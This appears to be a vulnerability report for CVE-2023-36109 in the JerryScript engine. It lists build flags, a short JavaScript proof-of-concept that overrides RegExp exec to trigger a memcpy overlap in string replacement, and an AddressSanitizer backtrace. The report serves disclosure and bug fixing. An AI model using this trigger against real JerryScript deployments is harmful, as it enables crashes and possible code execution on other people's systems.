Headline
CVE-2023-36109: ==1327323==ERROR: AddressSanitizer: memcpy-param-overlap: memory ranges [0x55fb3005c209,0x55fc3005c205) and [0x55fc3005c0f8, 0x55fd3005c0f4) overlap · Issue #5080 · jerryscript-project/jerryscript
Buffer Overflow vulnerability in JerryScript version 3.0, allows remote attackers to execute arbitrary code via ecma_stringbuilder_append_raw component at /jerry-core/ecma/base/ecma-helpers-string.c.
JerryScript revision
Version: v3.0.0
Build platform
Linux cqian-s2 5.4.0-148-generic #165-Ubuntu SMP Tue Apr 18 08:53:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linu
Build steps
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
Test case
let evil = new RegExp();
evil.exec = () => ({ 0: "1234567", length: 1, index: 0 });
"abc".replace(evil, "$'");
Execution platform
Unnecessary if the same as the build platform.
Execution steps
List the steps that trigger the bug.
E.g., if a bug is snapshot-specific:
build/bin/jerry-snapshot generate -o testcase.js.snapshot testcase.js build/bin/jerry --exec-snapshot testcase.js.snapshot
Output
SEGMENT
Backtrace
==1327323==ERROR: AddressSanitizer: memcpy-param-overlap: memory ranges [0x55fb3005c209,0x55fc3005c205) and [0x55fc3005c0f8, 0x55fd3005c0f4) overlap
#0 0x7fc34e7684ed in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:823
#1 0x55fc2ff5cea1 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34
#2 0x55fc2ff5cea1 in ecma_stringbuilder_append_raw /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:2609
#3 0x55fc2ffe19b0 in ecma_builtin_replace_substitute /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers.c:982
#4 0x55fc2ffe9c25 in ecma_regexp_replace_helper /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:2924
#5 0x55fc2ffe9c25 in ecma_builtin_regexp_prototype_dispatch_routine /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:602
#6 0x55fc2ff7dedc in ecma_builtin_dispatch_routine /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
#7 0x55fc2ff7dedc in ecma_builtin_dispatch_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
#8 0x55fc2ff7dedc in ecma_op_function_call_native_built_in /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
#9 0x55fc2ff84908 in ecma_op_function_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
#10 0x55fc2ffec6dc in ecma_op_function_validated_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371
#11 0x55fc2ffec6dc in ecma_builtin_string_prototype_object_replace_helper /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-string-prototype.c:555
#12 0x55fc2ffeda96 in ecma_builtin_string_prototype_dispatch_routine /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-string-prototype.c:1416
#13 0x55fc2ffeda96 in ecma_builtin_string_prototype_dispatch_routine /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-string-prototype.c:1369
#14 0x55fc2ff7dedc in ecma_builtin_dispatch_routine /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
#15 0x55fc2ff7dedc in ecma_builtin_dispatch_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
#16 0x55fc2ff7dedc in ecma_op_function_call_native_built_in /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
#17 0x55fc2ff84908 in ecma_op_function_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
#18 0x55fc2ffcf524 in ecma_op_function_validated_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371
#19 0x55fc2ffcf524 in opfunc_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/vm/vm.c:758
#20 0x55fc2ffcf524 in vm_execute /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/vm/vm.c:5217
#21 0x55fc2ffbca95 in vm_run /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/vm/vm.c:5312
#22 0x55fc2ff5f2a7 in vm_run_global /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/vm/vm.c:286
#23 0x55fc2ff5f2a7 in jerry_run /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/api/jerryscript.c:548
#24 0x55fc2ff51a41 in jerryx_source_exec_script /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-ext/util/sources.c:68
#25 0x55fc2ff51a41 in main /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-main/main-desktop.c:156
#26 0x7fc34e411082 in __libc_start_main ../csu/libc-start.c:308
#27 0x55fc2ff52abd in _start (/home2/dingjie/jsfuzz/fuzz_target/jerryscript/asan/bin/jerry+0x1eabd)
Credit: Lime